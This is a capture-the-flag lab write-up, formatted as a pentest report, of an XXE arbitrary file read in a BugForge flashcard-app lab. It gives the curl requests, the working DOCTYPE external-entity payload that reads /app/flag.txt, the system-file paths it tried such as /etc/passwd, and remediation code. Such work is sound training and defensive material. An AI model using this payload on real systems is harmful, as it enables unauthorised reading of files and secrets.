BugForge — 2026.05.08

Tanuki: Arbitrary File Read via XXE on XML Deck Import (2026-05-08 rotation)

BugForge XML External Entity (XXE) easy

Part 1 — Pentest Report

Executive Summary

Tanuki is a spaced repetition flashcard study app served from BugForge: React SPA + Express JSON API, Anki-derived SRS terminology, Japanese cultural framing. Users register, study seeded decks, and can import custom decks via file upload. The frontend file picker on the import page declares accept=".json,.xml", which surfaces an XML parser path the user-facing flow does not exercise. The XML parser resolves DOCTYPE-declared external entities and persists their expansion into the deck/card record, which is then echoed back via GET /api/decks/:id and GET /api/study/:deckId/cards.

Testing confirmed 1 finding:

ID	Title	Severity	CVSS	CWE	Endpoint
F1	XXE via XML Deck Import (External Entity Expansion)	High	7.5	CWE-611, CWE-827	POST /api/decks/import

The flag was retrieved by registering an account, mirroring a JSON deck shape into an XML body to confirm the parser path was live, then submitting an XML deck containing <!DOCTYPE deck [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]> with &xxe; placed in the description and a card front. Reading the deck back via GET /api/study/:id/cards returned the entity-expanded card front, with the flag in plaintext.

This is a lab-name rotation of the prior tanuki XXE engagement (2026-03-17). Same lab name, same vuln class, different lab build. The container hint string indicator pattern from the prior engagement was directly applied here.

Objective

Capture the lab flag (BugForge bug{...} format) from the Tanuki spaced repetition flashcard app.

Scope / Initial Access

# Target Application
URL: https://lab-1778111135105-ut5hno.labs-app.bugforge.io

# Auth details
Registration: POST /api/register {username, email, password, full_name}
Token format: JWT HS256, payload {id, username, iat} (no role claim)
Starting privileges: anonymous (registration is open and unauthenticated)

Registration is fully open. The JWT it returns carries no role claim, so role is read server side from the user record on each authenticated request. GET /api/verify-token returns the full user record including role. The same JWT authorizes the deck import endpoint where the bug lives.

Reconnaissance — Reading the Bundle for the Parser Inventory

Reconnaissance focused on the React bundle (/static/js/main.2a8c2eb1.js) and the response shapes from registration and the deck endpoints. The bundle was unminified enough to surface input element attributes, route paths, and the admin gate logic; no source maps were exposed.

The import page’s file picker declares accept=".json,.xml". Two formats means two parsers wired server side. The user-facing flow (the docs and seeded UX) is JSON deck import; XML is the format that does not appear in the UX but is still wired in. That mismatch is the recon premise that promotes XXE to the top of the hypothesis board.
The frontend renders the /admin link only when user.role === "admin". This is a frontend-side gate; the server side check is unknown until we hit /api/admin/* directly. Cheap to test in isolation.
The JWT carries {id, username, iat} and no role claim. Role is fetched server side via GET /api/verify-token on app load. Same architecture as the prior bugforge-cheesy-does-it lab (template reuse), which suggests the same team’s authentication and authorization wiring patterns.
Sequential integer IDs on decks, cards, and users. Our JWT id was 4, which means at least three accounts predated ours (likely admin and two seeded customers). IDOR is on the board but not the cheapest probe.

Application Architecture

Component	Detail
Backend	Node.js / Express (`X-Powered-By: Express` on every response)
Frontend	React + Material-UI single page application (build hash `main.2a8c2eb1.js`, ~516KB)
Auth	JWT HS256, payload `{id, username, iat}`, no role claim
CORS	`Access-Control-Allow-Origin: *` on every response
Database	Relational, snake_case schema (`card_count`, `cards_studied`, `user_id`), sequential integer IDs

API Surface

Endpoint	Method	Auth	Notes
/api/register	POST	none	Open registration; field allowlist enforced server side
/api/login	POST	none	Returns `{token, user}`
/api/verify-token	GET	JWT	Returns user including `role`
/api/decks	GET	JWT	Lists three seeded decks (id 1, 2, 3)
/api/decks/:id	GET	JWT	Single deck details
/api/decks/import	POST	JWT	Multipart upload, accepts `.json` and `.xml`
/api/study/:deckId/cards	GET	JWT	Returns cards with `front`, `back`, SM-2 fields
/api/study/progress	POST	JWT	SM-2 review submission
/api/study/sessions	GET	JWT	Lists user’s own sessions
/api/stats	GET	JWT	Aggregate stats
/api/admin/users	*	admin	Server enforced role check (returns 403 for non-admin)
/api/admin/decks	*	admin	Server enforced role check
/api/admin/cards	*	admin	Server enforced role check

Attack Chain Visualization

┌──────────────────┐   ┌──────────────────┐   ┌──────────────────┐   ┌──────────────────┐   ┌──────────────────┐
│ POST /register   │   │ FE accept=       │   │ Benign XML deck  │   │ XML <!DOCTYPE>   │   │ GET /api/study/  │
│ open register    │──▶│ ".json,.xml"     │──▶│ shape mirror     │──▶│ &xxe; →          │──▶│ N/cards reads    │
│ → our JWT        │   │ XML parser wired │   │ → parser alive   │   │ /app/flag.txt    │   │ flag in front    │
└──────────────────┘   └──────────────────┘   └──────────────────┘   └──────────────────┘   └──────────────────┘

Findings

F1 — XXE via XML Deck Import (External Entity Expansion)

Severity: High CVSS v3.1: 7.5 — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-827 (Improper Control of Document Type Definition) Endpoint: POST /api/decks/import Authentication required: Yes (any registered user; registration is open)

Description

The deck import endpoint accepts XML files and parses them with a parser that resolves DOCTYPE-declared external entities. Entity references placed in deck or card fields (e.g. <description> or a card’s <front>) are expanded into the persisted record at parse time, then echoed back when the deck is read via GET /api/decks/:id or GET /api/study/:deckId/cards. Combined with file:// URIs in the SYSTEM identifier, this lets an attacker read arbitrary local files that the application user has read access to.

PR:N reflects open public registration: any unauthenticated party can register and reach the endpoint in two requests, so the chain effectively starts unauthenticated. C:H reflects the demonstrated arbitrary file read disclosing the lab flag at /app/flag.txt. I:N and A:N reflect that the demonstrated impact is read-only file access without integrity or availability degradation.

Impact

Arbitrary local file read on the application container. The application user’s filesystem is exposed including any application-controlled secrets, source files, and configuration left in readable paths. The lab flag was disclosed from /app/flag.txt.

Reproduction

Step 1 — Register and capture the JWT

curl -sX POST https://lab-1778111135105-ut5hno.labs-app.bugforge.io/api/register \
  -H 'Content-Type: application/json' \
  -d '{"username":"haxor","email":"[email protected]","password":"password","full_name":""}'
# → 200 with {token, user}; our id is 4

Capture the token value as $TOKEN for subsequent requests.

Step 2 — Confirm the XML parser path is live

Before sending an entity-bearing payload, mirror the JSON deck shape into XML and submit a benign version. A clean import means the XML parser path is live, so the next request can carry the heavy payload.

<deck>
  <name>XMLProbe</name>
  <description>probe</description>
  <category>Probe</category>
  <cards>
    <card><front>front1</front><back>back1</back></card>
  </cards>
</deck>

curl -sX POST https://lab-…/api/decks/import \
  -H "Authorization: Bearer $TOKEN" \
  -F "[email protected];type=application/xml"
# → {"id":5,"message":"Deck imported successfully","cards_count":1}

Step 3 — Submit an XXE payload targeting the flag

<?xml version="1.0"?>
<!DOCTYPE deck [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]>
<deck>
  <name>x</name>
  <description>flag:&xxe;</description>
  <category>x</category>
  <cards>
    <card><front>flag-front:&xxe;</front><back>x</back></card>
  </cards>
</deck>

curl -sX POST https://lab-…/api/decks/import \
  -H "Authorization: Bearer $TOKEN" \
  -F "[email protected];type=application/xml"
# → {"id":6,"message":"Deck imported successfully","cards_count":1}

Step 4 — Read the deck back to recover the entity expansion

curl -s -H "Authorization: Bearer $TOKEN" https://lab-…/api/study/6/cards
# → {"front":"flag-front:bug{wlOG9b2NIVNP7JHbNZVr0dQQoTBB0cJA}", ...}

Flag: bug{wlOG9b2NIVNP7JHbNZVr0dQQoTBB0cJA}

Container Note

The application container has been built with several common recon paths replaced. /etc/passwd, /proc/self/cmdline, /proc/self/cwd/package.json, and /app/package.json all return the literal string “Flag is in a different file” rather than the expected file content. This is a hint string indicator, not a sandbox: the entity reference resolves and a string is returned, but the string is the lab author’s intentional decoy. The /app/flag.txt path is left untouched and reads cleanly. Pivoting from system paths to app paths via a batched 5-entity scan in one DOCTYPE landed the flag on the second exploit request. The pattern was previously documented from the 2026-03-17 tanuki engagement and applied directly here.

Remediation

Fix 1 — Reject DTD declarations and disable entity expansion

// BEFORE (Vulnerable)
const libxml = require('libxmljs');

app.post('/api/decks/import', upload.single('file'), (req, res) => {
  const xmlBody = req.file.buffer.toString();
  const doc = libxml.parseXml(xmlBody);   // entities expanded by default
  const deck = parseDeckFromXml(doc);
  saveDeck(deck);
  res.json({ id: deck.id, message: 'Deck imported successfully' });
});

// AFTER (Secure)
const libxml = require('libxmljs');

app.post('/api/decks/import', upload.single('file'), (req, res) => {
  const xmlBody = req.file.buffer.toString();

  // Reject any DTD or entity declarations before parsing
  if (/<!DOCTYPE|<!ENTITY/i.test(xmlBody)) {
    return res.status(400).json({ error: 'DTD declarations are not permitted' });
  }

  const doc = libxml.parseXml(xmlBody, {
    noent: false,    // do not substitute entity references
    noblanks: true,
    recover: false
  });

  // Allowlist deck fields at the deserialization boundary
  const deck = {
    name:        doc.get('//name')?.text(),
    description: doc.get('//description')?.text(),
    category:    doc.get('//category')?.text(),
    cards:       extractCards(doc)
  };
  saveDeck(deck);
  res.json({ id: deck.id, message: 'Deck imported successfully' });
});

The pre-parse reject pattern catches DOCTYPE before it hits the parser. The parser flags ensure that even if a DOCTYPE slips through (e.g. in a nested or otherwise formatted way), entity references are not substituted.

Fix 2 — Drop the XML format from the file picker if not needed

The user-facing flow is JSON deck import. If XML support is not a product requirement, remove .xml from the accept= attribute and reject XML server side too. Reducing the parser inventory removes the attack class entirely, which is strictly safer than hardening a parser for a format that no user actually needs.

Fix 3 — Sandbox the application user’s filesystem

Even with parser hardening, the application container should not have readable secrets sitting in /app. Move secrets to environment variables or an external secret store. Mount the application directory read-only where possible. Treat any arbitrary file read as the floor for impact; a hardened filesystem layout limits how bad that floor is.

Additional recommendations:

Validate uploaded files against an extension and content type allowlist before opening them with a parser. A .xml filename with a JSON body, or a .json filename with an XML body, should be rejected on the basis of the extension/content type mismatch.
If multi-format deck import is a requirement, document the supported parsers in an upload spec and harden each one explicitly. Multi-format file upload is a single feature with multiple attack classes; the hardening checklist should be explicit per format.

OWASP Top 10 Coverage

A03:2021 — Injection: XXE is a server-side injection where parser-controlled tokens (entity references) escape from data into a side channel (file read). The XML deck body is data, but the DOCTYPE is parser instruction.
A05:2021 — Security Misconfiguration: The XML parser is configured with default-permissive entity resolution. The multi-format file upload exposes a parser that the user-facing flow does not need.
A04:2021 — Insecure Design: The import surface ships with no parser hardening or per-format threat model. The frontend accept= attribute advertises an attack surface that did not need to exist.

Tools Used

Tool	Purpose
Caido	Proxy for crafting and replaying multipart uploads with arbitrary inner Content-Type
curl	Reproducible request flow documented in the writeup
Browser DevTools	Bundle reading (`/static/js/main.2a8c2eb1.js`) for the `accept=` attribute and route inspection
Discovered skill `xxe-container-file-enumeration`	Pattern from a prior tanuki engagement: container hint string indicator + batched entity scan across candidate app paths

References

CWE-611: https://cwe.mitre.org/data/definitions/611.html
CWE-827: https://cwe.mitre.org/data/definitions/827.html
OWASP XML External Entity Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
OWASP A03:2021 Injection: https://owasp.org/Top10/A03_2021-Injection/
Prior tanuki XXE writeup (2026-03-17): tanuki-xxe.md

Part 2 — Notes / Knowledge

Key Learnings

A multi-format file upload runs one parser per format, and every format on that list is its own attack class. XML invites XXE, YAML invites deserialization, archives invite zip slip, JSON invites prototype pollution and mass assignment, CSV invites formula injection. The frontend input’s accept= attribute is the cheapest signal of which formats are wired. Read it during recon, treat each entry as a separate hypothesis, and don’t default to the format the docs or UX show.
Send a parser-alive probe before any heavy parser-target payload. Mirror the documented shape (often the JSON example) into the candidate format and submit a benign version. Clean import means the parser is wired; send the attack payload next request. Format-specific 400 means parser alive but rejecting your shape; iterate. Generic “unsupported file type” means the parser is inactive for this format; move on. Applies to XXE, deserialization, prototype pollution, zip slip, formula injection: anywhere a heavy probe risks burning against a dead branch.

Failed Approaches

Approach	Result	Why It Failed
Direct `GET /api/admin/users` with a non-admin JWT (frontend-only admin gate hypothesis)	403 Forbidden, body `{"error":"Admin access required"}`	Server enforces role server side. Same template wiring as bugforge-cheesy-does-it (identical error string).
Mass assignment of `role:"admin"` on `POST /api/register`	Server returns user object without echoing `role`; `/api/verify-token` confirms `role:"user"` on the resulting JWT	Register handler applies a field allowlist; arbitrary fields in the body are dropped.
First XXE attempt with `file:///etc/passwd` and other system paths (`/proc/self/cmdline`, `/proc/self/cwd/package.json`, `/app/package.json`)	All four returned the literal string “Flag is in a different file” rather than the expected file content	Container build replaces popular recon paths with a hint string. The pivot to the flag direct path (`/app/flag.txt`) was the load-bearing step.

Tags: #bugforge #webapp #xxe #file-upload #xml #multipart #parser-alive-probe #container-hint #cwe-611 #cwe-827 Document Version: 1.0 Last Updated: 2026-05-08

#bugforge #webapp #xxe #file-upload #xml #multipart #parser-alive-probe #container-hint #cwe-611 #cwe-827